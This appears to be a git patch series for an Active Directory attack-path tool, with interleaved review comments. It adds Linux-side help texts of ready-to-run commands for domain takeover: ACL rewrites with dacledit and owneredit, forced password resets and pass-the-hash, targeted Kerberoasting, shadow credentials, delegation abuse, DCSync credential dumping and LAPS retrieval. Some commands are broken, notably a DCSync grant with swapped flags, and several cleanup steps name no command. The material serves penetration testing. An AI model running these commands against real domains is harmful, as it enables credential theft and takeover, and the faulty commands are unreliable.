+                                "dacledit.py -action 'write' -rights 'FullControl' -principal 'controlledUser' -target 'targetUser' 'domain'/'controlledUser':'password'"
+                            }
+                        
+                    
+ +

+ Cleanup of the added ACL can be performed later on with the same tool: +

+ +

+ With full control of a GPO, you may make modifications + to that GPO which will then apply to the users and + computers affected by the GPO. Select the target object + you wish to push an evil policy down to, then use the + gpedit GUI to modify the GPO, using an evil policy that + allows item-level targeting, such as a new immediate + scheduled task. Then wait at least 2 hours for the group + policy client to pick up and execute the new evil + policy. See the references tab for a more detailed write + up on this abuse`; +

+ +

+ pyGPOAbuse.py can be used for that purpose. +

+ + ); + case 'OU': + return ( + <> +

Control of the Organization Unit

+ +

+ With WriteDacl to an OU object, you may grant yourself + the GenericAll privilege. +

+ +

Generic Descendent Object Takeover

+

+ The simplest and most straight forward way to abuse + control of the OU is to apply a GenericAll ACE on the OU + that will inherit down to all object types. This + can be done using Impacket's dacledit (cf. "grant rights" + reference for the link). +

+ +
+                        
+                            {
+                                "dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'JKHOLER' -target-dn 'OUDistinguishedName' 'domain'/'user':'password'"
+                            }
+                        
+                    
+ +

+ Now, the "JKOHLER" user will have full control of all + descendent objects of each type. +

+ +

Targeted Descendent Object Takeoever

+ +

+ If you want to be more targeted with your approach, it + is possible to specify precisely what right you want to + apply to precisely which kinds of descendent objects. + Refer to the Windows Abuse info for this. +

+ + ); + case 'Container': + return ( + <> +

Control of the Container

+ +

+ With WriteDacl to a container object, you may grant yourself + the GenericAll privilege. +

+ +

Generic Descendent Object Takeover

+

+ The simplest and most straight forward way to abuse + control of the OU is to apply a GenericAll ACE on the OU + that will inherit down to all object types. This + can be done using Impacket's dacledit (cf. "grant rights" + reference for the link). +

+ +
+                        
+                            {
+                                "dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'JKHOLER' -target-dn 'containerDistinguishedName' 'domain'/'user':'password'"
+                            }
+                        
+                    
+ +

+ Now, the "JKOHLER" user will have full control of all + descendent objects of each type. +

+ +

Targeted Descendent Object Takeoever

+ +

+ If you want to be more targeted with your approach, it + is possible to specify precisely what right you want to + apply to precisely which kinds of descendent objects. + Refer to the Windows Abuse info for this. +

+ + ); + } +}; + +LinuxAbuse.propTypes = { + sourceName: PropTypes.string, + sourceType: PropTypes.string, + targetName: PropTypes.string, + targetType: PropTypes.string, + targetId: PropTypes.string, + haslaps: PropTypes.bool, +}; + +export default LinuxAbuse; diff --git a/src/components/Modals/HelpTexts/WriteDacl/References.jsx b/src/components/Modals/HelpTexts/WriteDacl/References.jsx index 080522146..d0798d4ce 100644 --- a/src/components/Modals/HelpTexts/WriteDacl/References.jsx +++ b/src/components/Modals/HelpTexts/WriteDacl/References.jsx @@ -42,6 +42,42 @@ const References = () => { https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectorysecurityinheritance?view=netframework-4.8 +
+ + https://github.com/Kevin-Robertson/Powermad#new-machineaccount + +
+ + https://www.thehacker.recipes/ad/movement/dacl/addmember + +
+ + https://www.thehacker.recipes/ad/movement/dacl/targeted-kerberoasting + +
+ + https://www.thehacker.recipes/ad/movement/group-policies + +
+ + https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword + +
+ + https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials + +
+ + https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync + +
+ + https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd + +
+ + https://www.thehacker.recipes/ad/movement/dacl/grant-rights + ); }; diff --git a/src/components/Modals/HelpTexts/WriteDacl/Abuse.jsx b/src/components/Modals/HelpTexts/WriteDacl/WindowsAbuse.jsx similarity index 99% rename from src/components/Modals/HelpTexts/WriteDacl/Abuse.jsx rename to src/components/Modals/HelpTexts/WriteDacl/WindowsAbuse.jsx index 56b3098c8..4d622128e 100644 --- a/src/components/Modals/HelpTexts/WriteDacl/Abuse.jsx +++ b/src/components/Modals/HelpTexts/WriteDacl/WindowsAbuse.jsx @@ -1,7 +1,7 @@ import React from 'react'; import PropTypes from 'prop-types'; -const Abuse = ({ +const WindowsAbuse = ({ sourceName, sourceType, targetName, @@ -840,7 +840,7 @@ const Abuse = ({ } }; -Abuse.propTypes = { +WindowsAbuse.propTypes = { sourceName: PropTypes.string, sourceType: PropTypes.string, targetName: PropTypes.string, @@ -849,4 +849,4 @@ Abuse.propTypes = { haslaps: PropTypes.bool, }; -export default Abuse; +export default WindowsAbuse; diff --git a/src/components/Modals/HelpTexts/WriteDacl/WriteDacl.jsx b/src/components/Modals/HelpTexts/WriteDacl/WriteDacl.jsx index e0239efcd..41e268820 100644 --- a/src/components/Modals/HelpTexts/WriteDacl/WriteDacl.jsx +++ b/src/components/Modals/HelpTexts/WriteDacl/WriteDacl.jsx @@ -2,7 +2,8 @@ import React from 'react'; import PropTypes from 'prop-types'; import { Tabs, Tab } from 'react-bootstrap'; import General from './General'; -import Abuse from './Abuse'; +import WindowsAbuse from './WindowsAbuse'; +import LinuxAbuse from './LinuxAbuse'; import Opsec from './Opsec'; import References from './References'; @@ -23,8 +24,8 @@ const WriteDacl = ({ targetType={targetType} />
- - + - + + + + - + From 0023864aed17c30a78adee756cb213bc72e3e8ab Mon Sep 17 00:00:00 2001 From: Shutdown Date: Mon, 19 Dec 2022 18:41:11 +0100 Subject: [PATCH 27/32] WriteOwner Linux abuse --- .../HelpTexts/WriteOwner/LinuxAbuse.jsx | 687 ++++++++++++++++++ .../{Abuse.jsx => WindowsAbuse.jsx} | 6 +- .../HelpTexts/WriteOwner/WriteOwner.jsx | 20 +- 3 files changed, 705 insertions(+), 8 deletions(-) create mode 100644 src/components/Modals/HelpTexts/WriteOwner/LinuxAbuse.jsx rename src/components/Modals/HelpTexts/WriteOwner/{Abuse.jsx => WindowsAbuse.jsx} (99%) diff --git a/src/components/Modals/HelpTexts/WriteOwner/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/WriteOwner/LinuxAbuse.jsx new file mode 100644 index 000000000..8045c73db --- /dev/null +++ b/src/components/Modals/HelpTexts/WriteOwner/LinuxAbuse.jsx @@ -0,0 +1,687 @@ +import React from 'react'; +import PropTypes from 'prop-types'; + +const LinuxAbuse = ({ + sourceName, + sourceType, + targetName, + targetType, + targetId, + haslaps, +}) => { + switch (targetType) { + case 'Group': + return ( + <> +

+ To change the ownership of the object, you may use Impacket's owneredit + example script (cf. "grant ownership" reference for the exact link). +

+ +
+                        
+                            {
+                                "owneredit.py -action write -owner 'attacker' -target 'victim' 'DOMAIN'/'USER':'PASSWORD'"
+                            }
+                        
+                    
+ +

Modifying the rights

+ +

+ To abuse ownership of a group object, you may grant + yourself the AddMember privilege. +

+ +

+ Impacket's dacledit can be used for that purpose (cf. + "grant rights" reference for the link). +

+ +
+                        
+                            {
+                                "dacledit.py -action 'write' -rights 'WriteMembers' -principal 'controlledUser' -target-dn 'groupDistinguidedName' 'domain'/'controlledUser':'password'"
+                            }
+                        
+                    
+ +

Adding to the group

+ +

+ You can now add members to the group. +

+ +

+ Use samba's net tool to add the user to the target group. The credentials can be supplied in cleartext + or prompted interactively if omitted from the command line: +

+ +
+                        
+                            {
+                                'net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                            }
+                        
+                    
+ +

+ Pass-the-hash can also be done here with pth-toolkit's net tool. + If the LM hash is not known it must be replace with ffffffffffffffffffffffffffffffff. +

+ +
+                        
+                            {
+                                'pth-net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"'
+                            }
+                        
+                    
+ +

+ Finally, verify that the user was successfully added to the group: +

+ +
+                        
+                            {
+                                'net rpc group members "TargetGroup" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                            }
+                        
+                    
+ +

Cleanup

+ +

+ Impacket's dacledit can be used for that purpose (cf. + "grant rights" reference for the link). +

+ +
+                        
+                            {
+                                "dacledit.py -action 'remove' -rights 'WriteMembers' -principal 'controlledUser' -target-dn 'groupDistinguidedName' 'domain'/'controlledUser':'password'"
+                            }
+                        
+                    
+ + ); + + case 'User': + return ( + <> +

+ To change the ownership of the object, you may use Impacket's owneredit + example script (cf. "grant ownership" reference for the exact link). +

+ +
+                        
+                            {
+                                "owneredit.py -action write -owner 'attacker' -target 'victim' 'DOMAIN'/'USER':'PASSWORD'"
+                            }
+                        
+                    
+ +

+ To abuse ownership of a user object, you may grant + yourself the GenericAll privilege. +

+ +

+ Impacket's dacledit can be used for that purpose (cf. + "grant rights" reference for the link). +

+ +
+                        
+                            {
+                                "dacledit.py -action 'write' -rights 'FullControl' -principal 'controlledUser' -target 'targetUser' 'domain'/'controlledUser':'password'"
+                            }
+                        
+                    
+ +

+ Cleanup of the added ACL can be performed later on with the same tool: +

+ +

Targeted Kerberoast

+ +

+ A targeted kerberoast attack can be performed using{' '} + targetedKerberoast.py. +

+ +
+                        
+                            {
+                                "targetedKerberoast.py -v -d 'domain.local' -u 'controlledUser' -p 'ItsPassword'"
+                            }
+                        
+                    
+ +

+ The tool will automatically attempt a targetedKerberoast + attack, either on all users or against a specific one if + specified in the command line, and then obtain a crackable hash. + The cleanup is done automatically as well. +

+ +

+ The recovered hash can be cracked offline using the tool + of your choice. +

+ +

Force Change Password

+ +

+ Use samba's net tool to change the user's password. The credentials can be supplied in cleartext + or prompted interactively if omitted from the command line. The new password will be prompted + if omitted from the command line. +

+ +
+                        
+                            {
+                                'net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                            }
+                        
+                    
+ +

+ Pass-the-hash can also be done here with pth-toolkit's net tool. + If the LM hash is not known it must be replace with ffffffffffffffffffffffffffffffff. +

+ +
+                        
+                            {
+                                'pth-net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"'
+                            }
+                        
+                    
+

+ Now that you know the target user's plain text password, you can + either start a new agent as that user, or use that user's + credentials in conjunction with PowerView's ACL abuse functions, + or perhaps even RDP to a system the target user has access to. + For more ideas and information, see the references tab. +

+ +

Shadow Credentials attack

+ +

To abuse this privilege, use pyWhisker.

+ +
+                        {'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}
+                    
+ +

+ For other optional parameters, view the pyWhisker documentation. +

+ + ); + case 'Computer': + if (haslaps) { + return ( + <> +

+ To change the ownership of the object, you may use Impacket's owneredit + example script (cf. "grant ownership" reference for the exact link). +

+ +
+                            
+                                {
+                                    "owneredit.py -action write -owner 'attacker' -target 'victim' 'DOMAIN'/'USER':'PASSWORD'"
+                                }
+                            
+                        
+ +

+ To abuse ownership of a computer object, you may + grant yourself the GenericAll privilege. +

+ +

+ Impacket's dacledit can be used for that purpose (cf. + "grant rights" reference for the link). +

+ +
+                            
+                                {
+                                    "dacledit.py -action 'write' -rights 'FullControl' -principal 'controlledUser' -target 'targetUser' 'domain'/'controlledUser':'password'"
+                                }
+                            
+                        
+ +

+ Cleanup of the added ACL can be performed later on with the same tool: +

+ +

Retrieve LAPS Password

+ +

+ Full control of a computer object is abusable when + the computer's local admin account credential is + controlled with LAPS. The clear-text password for + the local administrator account is stored in an + extended attribute on the computer object called + ms-Mcs-AdmPwd. With full control of the computer + object, you may have the ability to read this + attribute, or grant yourself the ability to read the + attribute by modifying the computer object's + security descriptor. +

+ +

+ LAPSDumper can be used + to retrieve LAPS passwords: +

+ +
+                            
+                                {
+                                    'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                                }
+                            
+                        
+ +

Resource-Based Constrained Delegation

+ +

+ First, if an attacker does not control an account with an + SPN set, a new attacker-controlled computer account can be + added with Impacket's addcomputer.py example script: +

+ +
+                            
+                                {
+                                    "addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'"
+                                }
+                            
+                        
+ +

+ We can then get a service ticket for the service name (sname) we + want to "pretend" to be "admin" for. Impacket's getST.py example script + can be used for that purpose. +

+ +
+                            
+                                {
+                                    "getST.py -spn 'cifs/targetcomputer.testlab.local' -impersonate 'admin' 'domain/attackersystem$:Summer2018!'"
+                                }
+                            
+                        
+ +

+ This ticket can then be used with Pass-the-Ticket, and could grant access + to the file system of the TARGETCOMPUTER. +

+ +

Shadow Credentials attack

+ +

To abuse this privilege, use pyWhisker.

+ +
+                            {'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}
+                        
+ +

+ For other optional parameters, view the pyWhisker documentation. +

+ + ); + } else { + return ( + <> +

+ To change the ownership of the object, you may use Impacket's owneredit + example script (cf. "grant ownership" reference for the exact link). +

+ +
+                            
+                                {
+                                    "owneredit.py -action write -owner 'attacker' -target 'victim' 'DOMAIN'/'USER':'PASSWORD'"
+                                }
+                            
+                        
+ +

+ To abuse ownership of a computer object, you may + grant yourself the GenericAll privilege. +

+ +

+ Impacket's dacledit can be used for that purpose (cf. + "grant rights" reference for the link). +

+ +
+                            
+                                {
+                                    "dacledit.py -action 'write' -rights 'FullControl' -principal 'controlledUser' -target 'targetUser' 'domain'/'controlledUser':'password'"
+                                }
+                            
+                        
+ +

+ Cleanup of the added ACL can be performed later on with the same tool: +

+ +

Resource-Based Constrained Delegation

+ +

+ First, if an attacker does not control an account with an + SPN set, a new attacker-controlled computer account can be + added with Impacket's addcomputer.py example script: +

+ +
+                            
+                                {
+                                    "addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'"
+                                }
+                            
+                        
+ +

+ We can then get a service ticket for the service name (sname) we + want to "pretend" to be "admin" for. Impacket's getST.py example script + can be used for that purpose. +

+ +
+                            
+                                {
+                                    "getST.py -spn 'cifs/targetcomputer.testlab.local' -impersonate 'admin' 'domain/attackersystem$:Summer2018!'"
+                                }
+                            
+                        
+ +

+ This ticket can then be used with Pass-the-Ticket, and could grant access + to the file system of the TARGETCOMPUTER. +

+ +

Shadow Credentials attack

+ +

To abuse this privilege, use pyWhisker.

+ +
+                            {'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}
+                        
+ +

+ For other optional parameters, view the pyWhisker documentation. +

+ + ); + } + case 'Domain': + return ( + <> +

+ To change the ownership of the object, you may use Impacket's owneredit + example script (cf. "grant ownership" reference for the exact link). +

+ +
+                        
+                            {
+                                "owneredit.py -action write -owner 'attacker' -target 'victim' 'DOMAIN'/'USER':'PASSWORD'"
+                            }
+                        
+                    
+ +

+ To abuse ownership of a domain object, you may grant + yourself the DcSync privileges. +

+ +

+ Impacket's dacledit can be used for that purpose (cf. + "grant rights" reference for the link). +

+ +
+                        
+                            {
+                                "dacledit.py -action 'DCSync' -rights 'FullControl' -principal 'controlledUser' -target-dn 'DomainDisinguishedName' 'domain'/'controlledUser':'password'"
+                            }
+                        
+                    
+ +

+ Cleanup of the added ACL can be performed later on with the same tool: +

+ +

DCSync

+ +

+ The AllExtendedRights privilege grants {sourceName} both the + DS-Replication-Get-Changes and + DS-Replication-Get-Changes-All privileges, which combined + allow a principal to replicate objects from the domain{' '} + {targetName}. +

+ +

+ This can be abused using Impacket's secretsdump.py example script: +

+ +
+                            
+                                {
+                                    "secretsdump 'DOMAIN'/'USER':'PASSWORD'@'DOMAINCONTROLLER'"
+                                }
+                            
+                    
+ +

Retrieve LAPS Passwords

+ +

+ If FullControl (GenericAll) is obtained on the domain, + instead of granting DCSync rights, the AllExtendedRights + privilege included grants {sourceName} enough{' '} + privileges to retrieve LAPS passwords domain-wise. +

+ +

+ LAPSDumper can be used + for that purpose: +

+ +
+                        
+                            {
+                                'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                            }
+                        
+                    
+ + ); + case 'GPO': + return ( + <> +

+ To change the ownership of the object, you may use Impacket's owneredit + example script (cf. "grant ownership" reference for the exact link). +

+ +
+                        
+                            {
+                                "owneredit.py -action write -owner 'attacker' -target 'victim' 'DOMAIN'/'USER':'PASSWORD'"
+                            }
+                        
+                    
+ +

+ To abuse ownership of a GPO, you may + grant yourself the GenericAll privilege. +

+ +

+ Impacket's dacledit can be used for that purpose (cf. + "grant rights" reference for the link). +

+ +
+                        
+                            {
+                                "dacledit.py -action 'write' -rights 'FullControl' -principal 'controlledUser' -target 'targetUser' 'domain'/'controlledUser':'password'"
+                            }
+                        
+                    
+ +

+ Cleanup of the added ACL can be performed later on with the same tool: +

+ +

+ With full control of a GPO, you may make modifications + to that GPO which will then apply to the users and + computers affected by the GPO. Select the target object + you wish to push an evil policy down to, then use the + gpedit GUI to modify the GPO, using an evil policy that + allows item-level targeting, such as a new immediate + scheduled task. Then wait at least 2 hours for the group + policy client to pick up and execute the new evil + policy. See the references tab for a more detailed write + up on this abuse`; +

+ +

+ pyGPOAbuse.py can be used for that purpose. +

+ + ); + case 'OU': + return ( + <> +

+ To change the ownership of the object, you may use Impacket's owneredit + example script (cf. "grant ownership" reference for the exact link). +

+ +
+                        
+                            {
+                                "owneredit.py -action write -owner 'attacker' -target 'victim' 'DOMAIN'/'USER':'PASSWORD'"
+                            }
+                        
+                    
+ +

Control of the Organization Unit

+ +

+ With ownership of the OU object, you may grant yourself + the GenericAll privilege. +

+ +

Generic Descendent Object Takeover

+

+ The simplest and most straight forward way to abuse + control of the OU is to apply a GenericAll ACE on the OU + that will inherit down to all object types. This + can be done using Impacket's dacledit (cf. "grant rights" + reference for the link). +

+ +
+                        
+                            {
+                                "dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'JKHOLER' -target-dn 'OUDistinguishedName' 'domain'/'user':'password'"
+                            }
+                        
+                    
+ +

+ Now, the "JKOHLER" user will have full control of all + descendent objects of each type. +

+ +

Targeted Descendent Object Takeoever

+ +

+ If you want to be more targeted with your approach, it + is possible to specify precisely what right you want to + apply to precisely which kinds of descendent objects. + Refer to the Windows Abuse info for this. +

+ + ); + case 'Container': + return ( + <> +

+ To change the ownership of the object, you may use Impacket's owneredit + example script (cf. "grant ownership" reference for the exact link). +

+ +
+                        
+                            {
+                                "owneredit.py -action write -owner 'attacker' -target 'victim' 'DOMAIN'/'USER':'PASSWORD'"
+                            }
+                        
+                    
+ +

Control of the Container

+ +

+ With ownership of the container object, you may grant yourself + the GenericAll privilege. +

+ +

Generic Descendent Object Takeover

+

+ The simplest and most straight forward way to abuse + control of the OU is to apply a GenericAll ACE on the OU + that will inherit down to all object types. This + can be done using Impacket's dacledit (cf. "grant rights" + reference for the link). +

+ +
+                        
+                            {
+                                "dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'JKHOLER' -target-dn 'containerDistinguishedName' 'domain'/'user':'password'"
+                            }
+                        
+                    
+ +

+ Now, the "JKOHLER" user will have full control of all + descendent objects of each type. +

+ +

Targeted Descendent Object Takeoever

+ +

+ If you want to be more targeted with your approach, it + is possible to specify precisely what right you want to + apply to precisely which kinds of descendent objects. + Refer to the Windows Abuse info for this. +

+ + ); + } +}; + +LinuxAbuse.propTypes = { + sourceName: PropTypes.string, + sourceType: PropTypes.string, + targetName: PropTypes.string, + targetType: PropTypes.string, + targetId: PropTypes.string, + haslaps: PropTypes.bool, +}; + +export default LinuxAbuse; diff --git a/src/components/Modals/HelpTexts/WriteOwner/Abuse.jsx b/src/components/Modals/HelpTexts/WriteOwner/WindowsAbuse.jsx similarity index 99% rename from src/components/Modals/HelpTexts/WriteOwner/Abuse.jsx rename to src/components/Modals/HelpTexts/WriteOwner/WindowsAbuse.jsx index 53d75e14b..3b51c292d 100644 --- a/src/components/Modals/HelpTexts/WriteOwner/Abuse.jsx +++ b/src/components/Modals/HelpTexts/WriteOwner/WindowsAbuse.jsx @@ -1,7 +1,7 @@ import React from 'react'; import PropTypes from 'prop-types'; -const Abuse = ({ +const WindowsAbuse = ({ sourceName, sourceType, targetName, @@ -854,7 +854,7 @@ const Abuse = ({ } }; -Abuse.propTypes = { +WindowsAbuse.propTypes = { sourceName: PropTypes.string, sourceType: PropTypes.string, targetName: PropTypes.string, @@ -862,4 +862,4 @@ Abuse.propTypes = { targetId: PropTypes.string, }; -export default Abuse; +export default WindowsAbuse; diff --git a/src/components/Modals/HelpTexts/WriteOwner/WriteOwner.jsx b/src/components/Modals/HelpTexts/WriteOwner/WriteOwner.jsx index 66954c36e..f9a6ef3af 100644 --- a/src/components/Modals/HelpTexts/WriteOwner/WriteOwner.jsx +++ b/src/components/Modals/HelpTexts/WriteOwner/WriteOwner.jsx @@ -2,7 +2,8 @@ import React from 'react'; import PropTypes from 'prop-types'; import { Tabs, Tab } from 'react-bootstrap'; import General from './General'; -import Abuse from './Abuse'; +import WindowsAbuse from './WindowsAbuse'; +import LinuxAbuse from './LinuxAbuse'; import Opsec from './Opsec'; import References from './References'; @@ -23,8 +24,8 @@ const WriteOwner = ({ targetType={targetType} />
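Review bot: The DCSync grant in the Domain case (the dacledit invocation that targets `DomainDisinguishedName`) has its flags swapped: `-action 'DCSync' -rights 'FullControl'` is not one of dacledit's actions as far as I recall (read/write/remove/backup/restore), and even read charitably it would grant FullControl rather than the replication rights the paragraph above it promises, so it should read `dacledit.py -action 'write' -rights 'DCSync' -principal 'controlledUser' -target-dn 'DomainDistinguishedName' 'domain'/'controlledUser':'password'`. Every sentence ending in "Cleanup of the added ACL can be performed later on with the same tool:" (User, both Computer branches, Domain, GPO) is followed by no command, while the Group case spells out its `-action 'remove'` counterpart; the other cases should either get their matching remove invocation or lose the colon. A pass over copy-paste residue is warranted: `groupDistinguidedName`, `Takeoever`, "must be replace with", the stray backtick in "this abuse`;", the principal spelled `JKHOLER` in the commands but "JKOHLER" in the prose, and the Container case still saying "control of the OU ... on the OU". The two Computer branches differ only in the LAPS section, so the owneredit/dacledit, RBCD and Shadow Credentials blocks could be hoisted into small local fragments and the `haslaps` check reduced to one conditional block. The `switch` has no `default`, so a targetType outside the listed cases returns undefined from the component, which older React versions report as a render error; `default: return null;` is the cheap guard.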
- - + - + + + + - + From 867990f83d11eba1b3c694ffcafdd51693851d95 Mon Sep 17 00:00:00 2001 From: Shutdown Date: Mon, 19 Dec 2022 18:41:22 +0100 Subject: [PATCH 28/32] WriteSPN Linux abuse --- .../Modals/HelpTexts/WriteSPN/LinuxAbuse.jsx | 40 +++++++++++++++++++ .../WriteSPN/{Abuse.jsx => WindowsAbuse.jsx} | 6 +-- .../Modals/HelpTexts/WriteSPN/WriteSPN.jsx | 14 ++++--- 3 files changed, 52 insertions(+), 8 deletions(-) create mode 100644 src/components/Modals/HelpTexts/WriteSPN/LinuxAbuse.jsx rename src/components/Modals/HelpTexts/WriteSPN/{Abuse.jsx => WindowsAbuse.jsx} (95%) diff --git a/src/components/Modals/HelpTexts/WriteSPN/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/WriteSPN/LinuxAbuse.jsx new file mode 100644 index 000000000..40c7a0933 --- /dev/null +++ b/src/components/Modals/HelpTexts/WriteSPN/LinuxAbuse.jsx @@ -0,0 +1,40 @@ +import React from 'react'; +import PropTypes from 'prop-types'; + +const LinuxAbuse = ({ sourceName, sourceType }) => { + return ( + <> +

+ A targeted kerberoast attack can be performed using{' '} + targetedKerberoast.py. +

+ +
+                
+                    {
+                        "targetedKerberoast.py -v -d 'domain.local' -u 'controlledUser' -p 'ItsPassword'"
+                    }
+                
+            
+ +

+ The tool will automatically attempt a targetedKerberoast + attack, either on all users or against a specific one if + specified in the command line, and then obtain a crackable hash. + The cleanup is done automatically as well. +

+ +

+ The recovered hash can be cracked offline using the tool + of your choice. +

+ + ); +}; + +LinuxAbuse.propTypes = { + sourceName: PropTypes.string, + sourceType: PropTypes.string, +}; + +export default LinuxAbuse; diff --git a/src/components/Modals/HelpTexts/WriteSPN/Abuse.jsx b/src/components/Modals/HelpTexts/WriteSPN/WindowsAbuse.jsx similarity index 95% rename from src/components/Modals/HelpTexts/WriteSPN/Abuse.jsx rename to src/components/Modals/HelpTexts/WriteSPN/WindowsAbuse.jsx index 912c162d5..29d71ceef 100644 --- a/src/components/Modals/HelpTexts/WriteSPN/Abuse.jsx +++ b/src/components/Modals/HelpTexts/WriteSPN/WindowsAbuse.jsx @@ -1,7 +1,7 @@ import React from 'react'; import PropTypes from 'prop-types'; -const Abuse = ({ sourceName, sourceType }) => { +const WindowsAbuse = ({ sourceName, sourceType }) => { return ( <>
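Review bot: `sourceName` and `sourceType` are destructured in the LinuxAbuse signature and declared in propTypes, but neither is referenced anywhere in the returned fragment; the text is entirely static. Either drop both from the destructuring and the propTypes block, or use `sourceName` in the opening sentence so the help text names the controlled principal the way the props imply (the Windows variant presumably does this, but its body is outside this hunk). As written, a linter with no-unused-vars will flag the signature.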

@@ -58,9 +58,9 @@ const Abuse = ({ sourceName, sourceType }) => { ); }; -Abuse.propTypes = { +WindowsAbuse.propTypes = { sourceName: PropTypes.string, sourceType: PropTypes.string, }; -export default Abuse; +export default WindowsAbuse; diff --git a/src/components/Modals/HelpTexts/WriteSPN/WriteSPN.jsx b/src/components/Modals/HelpTexts/WriteSPN/WriteSPN.jsx index f8934551f..dfa979b91 100644 --- a/src/components/Modals/HelpTexts/WriteSPN/WriteSPN.jsx +++ b/src/components/Modals/HelpTexts/WriteSPN/WriteSPN.jsx @@ -2,7 +2,8 @@ import React from 'react'; import PropTypes from 'prop-types'; import { Tabs, Tab } from 'react-bootstrap'; import General from './General'; -import Abuse from './Abuse'; +import WindowsAbuse from './WindowsAbuse'; +import LinuxAbuse from './LinuxAbuse'; import Opsec from './Opsec'; import References from './References'; @@ -17,13 +18,16 @@ const WriteSPN = ({ sourceName, sourceType, targetName, targetType }) => { targetType={targetType} /> - - + + - + + + + - + From e4e9a181c24bd9b5eb2d9dc09c4b61b9c17b01a1 Mon Sep 17 00:00:00 2001 From: Shutdown <40902872+ShutdownRepo@users.noreply.github.com> Date: Fri, 20 Jan 2023 17:29:08 +0100 Subject: [PATCH 29/32] Removing addcomputer.py step for AllowedToAct --- .../Modals/HelpTexts/AllowedToAct/LinuxAbuse.jsx | 10 ---------- 1 file changed, 10 deletions(-) diff --git a/src/components/Modals/HelpTexts/AllowedToAct/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/AllowedToAct/LinuxAbuse.jsx index 4360a5956..f4ea96c67 100644 --- a/src/components/Modals/HelpTexts/AllowedToAct/LinuxAbuse.jsx +++ b/src/components/Modals/HelpTexts/AllowedToAct/LinuxAbuse.jsx @@ -4,16 +4,6 @@ import PropTypes from 'prop-types'; const LinuxAbuse = ({ sourceName }) => { return ( <> - First, if an attacker does not control an account with an - SPN set, a new attacker-controlled computer account can be - added with Impacket's addcomputer.py example script: -

-                
-                    {
-                        "addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'"
-                    }
-                
-            
We can then get a service ticket for the service name (sname) we want to "pretend" to be "admin" for. Impacket's getST.py example script can be used for that purpose. From 1714f2e5dc7b943ca69c8f24edfb4be6227473ae Mon Sep 17 00:00:00 2001 From: Shutdown <40902872+ShutdownRepo@users.noreply.github.com> Date: Fri, 20 Jan 2023 17:30:10 +0100 Subject: [PATCH 30/32] Fixed missing extension for secretsdump on DCSync, Getchanges, GetChangesAll --- src/components/Modals/HelpTexts/DCSync/LinuxAbuse.jsx | 2 +- src/components/Modals/HelpTexts/GetChanges/LinuxAbuse.jsx | 2 +- src/components/Modals/HelpTexts/GetChangesAll/LinuxAbuse.jsx | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/src/components/Modals/HelpTexts/DCSync/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/DCSync/LinuxAbuse.jsx index 0d0855642..f30480e7c 100644 --- a/src/components/Modals/HelpTexts/DCSync/LinuxAbuse.jsx +++ b/src/components/Modals/HelpTexts/DCSync/LinuxAbuse.jsx @@ -11,7 +11,7 @@ const LinuxAbuse = () => {
                 
                     {
-                        "secretsdump 'testlab.local'/'Administrator':'Password'@'DOMAINCONTROLLER'"
+                        "secretsdump.py 'testlab.local'/'Administrator':'Password'@'DOMAINCONTROLLER'"
                     }
                 
             
diff --git a/src/components/Modals/HelpTexts/GetChanges/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/GetChanges/LinuxAbuse.jsx
index 0d0855642..f30480e7c 100644
--- a/src/components/Modals/HelpTexts/GetChanges/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/GetChanges/LinuxAbuse.jsx
@@ -11,7 +11,7 @@ const LinuxAbuse = () => {
                 
                     {
-                        "secretsdump 'testlab.local'/'Administrator':'Password'@'DOMAINCONTROLLER'"
+                        "secretsdump.py 'testlab.local'/'Administrator':'Password'@'DOMAINCONTROLLER'"
                     }
                 
             
diff --git a/src/components/Modals/HelpTexts/GetChangesAll/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/GetChangesAll/LinuxAbuse.jsx
index 0d0855642..f30480e7c 100644
--- a/src/components/Modals/HelpTexts/GetChangesAll/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/GetChangesAll/LinuxAbuse.jsx
@@ -11,7 +11,7 @@ const LinuxAbuse = () => {
                 
                     {
-                        "secretsdump 'testlab.local'/'Administrator':'Password'@'DOMAINCONTROLLER'"
+                        "secretsdump.py 'testlab.local'/'Administrator':'Password'@'DOMAINCONTROLLER'"
                     }
                 
             
